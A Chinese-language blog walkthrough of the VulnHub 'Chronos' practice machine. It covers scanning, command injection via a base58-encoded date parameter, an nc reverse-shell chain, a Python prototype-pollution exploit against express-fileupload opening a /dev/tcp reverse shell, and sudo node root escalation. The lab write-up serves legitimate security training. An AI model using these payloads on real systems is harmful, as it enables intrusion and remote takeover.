vulnhub靶场-Chronos

最新推荐文章于 2024-05-09 10:01:45 发布
最新推荐文章于 2024-05-09 10:01:45 发布
阅读量839 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42947816/article/details/124699409
版权

1、靶机信息

靶机名称:Chronos

靶机难度:中等

虚拟机环境:此靶机推荐使用Virtualbox搭建

目标:取得 2 个 flag + root 权限

靶机地址:https://download.vulnhub.com/chronos/Chronos.ova

kali服务器IP

192.168.137.81

靶机IP

192.168.137.205

2、主机发现

通过使用arp协议对同一网段的靶机进行主机发现,扫描出192.168.137.205为我们目标靶机

arp-scan -l

3、端口扫描

通过使用nmap工具对全端口进行发现,再进行版本扫描,我们发现开放22,80,8000三个端口

nmap -p- 192.168.137.205

nmap -sV -p 22,80,8000 192.168.137.205

4、Web信息收集

4.1 打开80端口Web页面

4.2 查看页面源代码,我们在其中发现一串可疑信息,使用Cyberchef对js进行美化,调用JavaScript Beautify让其变为更直观

var _0x5bdf = [
	'150447srWefj',
	'70lwLrol',
	'1658165LmcNig',
	'open',
	'1260881JUqdKM',
	'10737CrnEEe',
	'2SjTdWC',
	'readyState',
	'responseText',
	'1278676qXleJg',
	'797116soVTES',
	'onreadystatechange',
	'http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL',
	'User-Agent',
	'status',
	'1DYOODT',
	'400909Mbbcfr',
	'Chronos',
	'2QRBPWS',
	'getElementById',
	'innerHTML',
	'date'
];
(function (_0x506b95, _0x817e36) {
	var _0x244260 = _0x432d;
	while (!![]) {
		try {
			var _0x35824b = -parseInt(_0x244260(126)) * parseInt(_0x244260(144)) + parseInt(_0x244260(142)) + parseInt(_0x244260(127)) * parseInt(_0x244260(131)) + -parseInt(_0x244260(135)) + -parseInt(_0x244260(130)) * parseInt(_0x244260(141)) + -parseInt(_0x244260(136)) + parseInt(_0x244260(128)) * parseInt(_0x244260(132));
			if (_0x35824b === _0x817e36)
				break;
			else
				_0x506b95['push'](_0x506b95['shift']());
		} catch (_0x3fb1dc) {
			_0x506b95['push'](_0x506b95['shift']());
		}
	}
}(_0x5bdf, 831262));
function _0x432d(_0x16bd66, _0x33ffa9) {
	return _0x432d = function (_0x5bdf82, _0x432dc8) {
		_0x5bdf82 = _0x5bdf82 - 126;
		var _0x4da6e8 = _0x5bdf[_0x5bdf82];
		return _0x4da6e8;
	}, _0x432d(_0x16bd66, _0x33ffa9);
}
function loadDoc() {
	var _0x17df92 = _0x432d, _0x1cff55 = _0x17df92(143), _0x2beb35 = new XMLHttpRequest();
	_0x2beb35[_0x17df92(137)] = function () {
		var _0x146f5d = _0x17df92;
		this[_0x146f5d(133)] == 4 && this[_0x146f5d(140)] == 200 && (document[_0x146f5d(145)](_0x146f5d(147))[_0x146f5d(146)] = this[_0x146f5d(134)]);
	}, _0x2beb35[_0x17df92(129)]('GET', _0x17df92(138), !![]), _0x2beb35['setRequestHeader'](_0x17df92(139), _0x1cff55), _0x2beb35['send']();

4.3 在页面源代码中发现一串疑似Base编码,'http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL',使用cyberchef 进行解码

解码前:

4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

使用cyberchef magic功能解码后:

'+Today is %A, %B %d, %Y %H:%M:%S.'

4.4 http://chronos.local:8000 似乎是作者引导我们去访问这个站点,而这台靶机开放了8000端口,我们改一下/etc/hosts文件,重新刷新页面,页面出现了一行日期,这行日期就是4.3解码后的内容,那这边可能是存在一个命令执行

4.5 我们使用burp进行抓包,并修改base58的值,使用CyberChef 进行转换

4.6 burp修改请求,发现命令成功执行

4.7 使用nc进行反弹shell

&& nc 192.168.137.81 8888 | /bin/bash | nc 192.168.137.81 9999

base58编码后:

3Gho48Ayo8ZTkKBJiuZUzjx5XbQLrVocowNVvpHX9LSew4WpvASt4istptg6FQeT7kapen7QxKdVGC5uL75aG

5、本地提权

5.1 本地文件信息收集,发现本机还有一个用户imera

cat /etc/passwd

5.2 在imera目录下,发现user.txt,但我们没有权限访问,那作者的意图很明显,需要我们提权到imera用户或者root用户去打开这个文件

5.3 在/opt/chronos-v2/backend中,发现一个server.js文件,通过搜索,我们发现express fileupload存在一个命令注入漏洞,并且此web服务存在于本机127.0.0.1的8080端口

5.4 使用exp直接利用,取得imera用户权限

项目原文地址:Real-world JS - 1

import requests

cmd = 'bash -c "bash -i &> /dev/tcp/192.168.137.81/9999 0>&1"'

# pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

# execute command
requests.get('http://127.0.0.1:8080')

5.5 获取第一个flag,在imera用户目录下

byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK

5.6 再次尝试提权到root,我们发现此用户可以无密码以root身份调用node和npm命令

5.7 使用node提权成功

sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'

5.8 拿到最后一个flag,在root目录下

YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK

KALC
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub之Chronos:1 靶机实验
weixin_64112307的博客
06-30 957
EJS-RCE
node-red-contrib-chronos:基于时间的Node-RED调度,排队,路由,过滤和操作节点
04-29
节点红色贡献时间 Node-RED节点的集合,用于基于日期和时间的调度,排队,路由,过滤和操作。 还支持自动计算太阳事件(日出,日落,黄昏,黎明等)或月亮事件(月出,月落)的时间。 如果您遇到错误,想提出一个新...
Vulnhub靶机--Chronos
Tauil的博客
08-05 584
登录靶机页面,查看网络数据包,发现有两个数据包被拒绝了,查看到其IP显示为chronos.local,其回显仍然是靶机IP,所以需要修改 dns 指向,在本地 hosts 文件中将该网站进行自定义转向,输入命令。尝试将该参数进行解码,发现是base58编码,并且该语句后面衔接其他命令是可执行的,那么要是该网页输入参数没有进行替换或者过滤的话,便可以执行任意语句。发现该靶机还开了另外一个网络服务,在本地8080端口,而外网无法访问到,我们先找到该网络服务所在文件,发现在另一个版本的chronos-v2中。..
探索时间解析的利器:Chrono JavaScript库
最新发布
gitblog_00063的博客
05-09 391
探索时间解析的利器:Chrono JavaScript库 项目地址:https://gitcode.com/wanasit/chrono 项目简介 Chrono是一个强大的JavaScript自然语言日期解析库,它能够从任何文本中准确提取日期和时间信息。不论是“今天”、“明天”,还是“上周五”这样的模糊表达,或是具体的“2013年8月17日到19日”的区间,甚至包括时间戳和特定的日期时间格式,Ch...
vulnhub chronos
weixin_46107179的博客
04-06 4373
靶机下载地址 主机发现 二层扫描:arp-scan -l 或则 netdiscover -r 10.0.2.0/24,扫描得到主机的IP地址10.0.2.6 信息搜集 通过nmap信息搜集主机信息,得到主机开放了22,80,8000端口,并且用的web服务是通过node.js的Express framework写的,以及中间件是Apache等信息 然后用浏览器打开这两个端口,发现这两个页面其实是一个页面,知识80端口那个页面是8000端口加了css样式的,然后尝试扫描隐藏目录,并没有什么发现;但是在查
Vulnhub系列--CHRONOS: 1
ch3cke的博客
03-31 4229
本次渗透测试我将使用cs来辅助进行渗透: 打点 主机存活发现: ┌──(kali㉿kali)-[~] └─$ nmap -sP 192.168.56.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:35 EDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or spec.
VulnHub靶场-Chronos
热爱学习,喜欢折腾!
06-11 846
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBoxBoot打开,从启动虚机到获取操作系统的root权限和查看flag。
auth-system-chronos:使用德州仪器 (TI) 的 eZ430-Chronos 手表和 CC1111 的接近身份验证系统
06-28
使用 eZ430-Chronos 和 CC1111 进行近距离身份验证。 使用 eZ430-Chronos 手表的近距离身份验证系统。涉及要素 Client: eZ430-ChronosAP: CC1111 + PCServer: PC在职的我们制定了一个协议来在 eZ430-Chronos 和 CC...
Laravel开发-chronos
08-28
Laravel开发-chronos Laravel雄辩模型的活动日志
eZ430-Chronos_Software.rar_ez430_chronos
09-24
ez430-chronos 手表的软件功能描述
Laravel开发-laravel-chronos
08-28
Laravel开发-laravel-chronos 将碳\碳替换为蛋糕\计时\计时
chrono:Java语言中的自然语言日期解析器
02-26
计时(v2) Java语言中的自然语言日期解析器。 它旨在处理大多数日期/时间格式并从任何给定的文本中提取信息: 今天,明天,昨天,最后一个星期五等 2013年8月17日-2013年8月19日 这个星期五从13:00-16.00 5天前 从现在起2周 2013年8月17日星期六18:40:39 GMT + 0900(JST) 2014-11-30T08:15:30-05:30 安装 使用npm: $ npm install --save chrono-node import * as chrono from 'chrono-node' ; chrono . parseDate ( 'An appointment on Sep 12-13' ) ; 对于Node.js: const chrono = require ( 'chrono-node' ) ; // or `im
vulhub靶场之chronos靶场渗透全过程 :
weixin_62319197的博客
03-14 400
本文记录了对vulhub一个靶场的打靶拿到root权限全过程 内容比较基础。
VulnHub日记(十八):Chronos: 1
Dawn_Xi的博客
02-12 3091
参考链接 Vulnhub: 参考博客 GTFOBins 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.126 fping -aqg 192.168.56.0/24 nmap 扫描主机 nmap -A -T4 -v 192.168.56.126 扫描目录无果,开放22,80和8000,访问 内容相似,bp抓包,发现参数format 将内容进行识别,可能是base64或base58 两个都测试后,是base58 bp去除参数,查看结果比较,猜测是date命
VulnHub靶场】——CHRONOS: 1
热门推荐
Demo不是emo的博客
12-31 1万+
24次系统性打靶第三次训练,每次打靶后都会分享靶场攻略和总结的知识点
Chronos靶机打靶过程(利用express-fileupload)
捣蛋鬼
03-27 3858
难度:中(构思巧妙) 目标:取得2个flag+root权限 涉及攻击方法: 端口扫描 WEB侦察 命令注入 数据编解码 搜索大法 框架漏洞利用 代码审计 NC串联 本地提权 0x01 sudo netdiscover -r 10.0.2.0/16 #主机发现 sudo nmap -p- 10.0.2.6 #扫描全端口 sudo nmap -p22,80,8000 -sV 10.0.2.6 #扫描端口所开启的服务 0x02 访问80端口并查看页面源码 在script标签里发现一段脚本 v
vulnhub之devguru靶场提权过程(vulnhub打靶日记)
guanjian_ci的博客
04-02 971
考点:1、拿下站点、敏感文件后,需要细心的审计搜索有价值的信息,特别是账号密码。2、常见网站october、gieat的历史漏洞,利用已知漏洞反弹shell,拿下网站。3、熟悉数据库后台创建用户,添加用户组,编辑用户的操作。4、了解linux提权常用操作,内核漏洞>suid/sudo>环境变量/计划任务等等。难点:1、常见网站october、gieat的历史漏洞,这些站点的漏洞能否成功利用提权,对于小白来说是块硬骨头。2、获取mysql的frank用户时,此处用的是修改加密方式、修改密码。
Mysql udf提权靶场-vulnhub Raven2
m0_62399876的博客
08-18 1674
最近学习的时候学到了udf提权,想着来实操一下。同时也记录一下我的理解。udf(User Defined Function)是用户自定义函数,是通过添加新函数,对MYSQL的功能进行扩充。udf的原意是为了让开发者能够自己写方便自己的函数。...
Chronos靶机打靶过程与思路
qq_52610024的博客
04-06 3373
1.常规主机侦探,sudonetdiscover-r10.0.2.0/162.常规端口和服务侦探3.cyberchet解码器,针对js代码4.发现一个本地域名解析地址,修改etc下的hosts文件对应地址解析5.bp抓包后在cyberchef平台上解码发现为base58编码,是一串时间的函数执行,所以考虑使用命令执行6.编码后提交nc串联攻击获得反弹shell,开始代码审计,最后发现node.js下的express-fileupload模块。...
Capacity mismatch for disk D:\镜像\Vulnhub\Chronos\\Chronos-disk1
07-22
感谢您提供的更多细节。根据您提供的信息,磁盘D的容量不匹配可能是由于镜像文件或文件夹的大小与实际磁盘容量不一致引起的。您可以尝试以下解决方案来解决这个问题: 1. 检查文件大小:首先确认您的镜像文件或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值